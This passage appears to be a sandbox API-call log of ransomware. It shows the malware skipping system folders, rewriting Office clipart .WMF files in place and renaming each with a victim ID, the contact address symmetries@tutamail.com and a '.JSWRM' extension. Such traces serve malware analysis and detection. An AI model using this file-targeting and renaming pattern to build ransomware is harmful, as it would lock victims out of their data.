WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0087.772] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199609.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.775] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12332) returned 1 [0087.775] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3020) returned 0x24d210 [0087.775] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3020, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3020, lpOverlapped=0x0) returned 1 [0087.777] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.777] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3020, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3020, lpOverlapped=0x0) returned 1 [0087.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.777] CloseHandle (hObject=0x314) returned 1 [0087.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0087.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0087.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0087.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0087.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0087.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0087.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0087.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0087.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.778] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199609.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199609.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0087.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0087.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0087.778] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebfae8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2004, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0200151.WMF", cAlternateFileName="")) returned 1 [0087.779] lstrcmpiW (lpString1="J0200151.WMF", lpString2=".") returned 1 [0087.779] lstrcmpiW (lpString1="J0200151.WMF", lpString2="..") returned 1 [0087.779] lstrcmpiW (lpString1="J0200151.WMF", lpString2="...") returned 1 [0087.779] lstrcmpiW (lpString1="J0200151.WMF", lpString2="windows") returned -1 [0087.779] lstrcmpiW (lpString1="J0200151.WMF", lpString2="recovery") returned -1 [0087.779] lstrcmpiW (lpString1="J0200151.WMF", lpString2="perflogs") returned -1 [0087.779] lstrcmpiW (lpString1="J0200151.WMF", lpString2="documents and settings") returned 1 [0087.779] lstrcmpiW (lpString1="J0200151.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.779] lstrcmpiW (lpString1="J0200151.WMF", lpString2="system volume information") returned -1 [0087.779] lstrcmpiW (lpString1="J0200151.WMF", lpString2="msocache") returned -1 [0087.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0087.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200151.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200151.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200151.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0087.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0087.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200151.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200151.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200151.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0087.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0087.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0087.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0087.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200151.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200151.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.780] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8196) returned 1 [0087.780] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2000) returned 0x205850 [0087.780] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2000, lpOverlapped=0x0) returned 1 [0087.791] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.791] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2000, lpOverlapped=0x0) returned 1 [0087.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0087.791] CloseHandle (hObject=0x314) returned 1 [0087.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0087.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0087.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0087.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0087.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0087.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0087.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.791] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200151.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200151.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200151.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200151.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0087.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0087.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0087.792] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebfae8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c0c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0200163.WMF", cAlternateFileName="")) returned 1 [0087.792] lstrcmpiW (lpString1="J0200163.WMF", lpString2=".") returned 1 [0087.792] lstrcmpiW (lpString1="J0200163.WMF", lpString2="..") returned 1 [0087.792] lstrcmpiW (lpString1="J0200163.WMF", lpString2="...") returned 1 [0087.792] lstrcmpiW (lpString1="J0200163.WMF", lpString2="windows") returned -1 [0087.792] lstrcmpiW (lpString1="J0200163.WMF", lpString2="recovery") returned -1 [0087.793] lstrcmpiW (lpString1="J0200163.WMF", lpString2="perflogs") returned -1 [0087.793] lstrcmpiW (lpString1="J0200163.WMF", lpString2="documents and settings") returned 1 [0087.793] lstrcmpiW (lpString1="J0200163.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.793] lstrcmpiW (lpString1="J0200163.WMF", lpString2="system volume information") returned -1 [0087.793] lstrcmpiW (lpString1="J0200163.WMF", lpString2="msocache") returned -1 [0087.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0087.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200163.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200163.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200163.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0087.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0087.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200163.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200163.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200163.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0087.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0087.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0087.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0087.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200163.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200163.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.794] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7180) returned 1 [0087.794] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1c00) returned 0x205850 [0087.794] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1c00, lpOverlapped=0x0) returned 1 [0087.796] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.796] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1c00, lpOverlapped=0x0) returned 1 [0087.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0087.796] CloseHandle (hObject=0x314) returned 1 [0087.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0087.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0087.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0087.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0087.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0087.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0087.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0087.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0087.797] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200163.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200163.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200163.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200163.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0087.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0087.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0087.797] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebfae8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14c0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0200183.WMF", cAlternateFileName="")) returned 1 [0087.797] lstrcmpiW (lpString1="J0200183.WMF", lpString2=".") returned 1 [0087.797] lstrcmpiW (lpString1="J0200183.WMF", lpString2="..") returned 1 [0087.797] lstrcmpiW (lpString1="J0200183.WMF", lpString2="...") returned 1 [0087.797] lstrcmpiW (lpString1="J0200183.WMF", lpString2="windows") returned -1 [0087.797] lstrcmpiW (lpString1="J0200183.WMF", lpString2="recovery") returned -1 [0087.797] lstrcmpiW (lpString1="J0200183.WMF", lpString2="perflogs") returned -1 [0087.797] lstrcmpiW (lpString1="J0200183.WMF", lpString2="documents and settings") returned 1 [0087.798] lstrcmpiW (lpString1="J0200183.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.798] lstrcmpiW (lpString1="J0200183.WMF", lpString2="system volume information") returned -1 [0087.798] lstrcmpiW (lpString1="J0200183.WMF", lpString2="msocache") returned -1 [0087.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0087.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200183.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200183.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200183.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0087.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0087.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200183.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200183.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200183.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0087.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0087.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0087.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0087.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200183.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200183.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.798] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5312) returned 1 [0087.798] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14c0) returned 0x205850 [0087.798] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x14c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x14c0, lpOverlapped=0x0) returned 1 [0087.800] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.800] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x14c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x14c0, lpOverlapped=0x0) returned 1 [0087.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0087.800] CloseHandle (hObject=0x314) returned 1 [0087.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0087.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 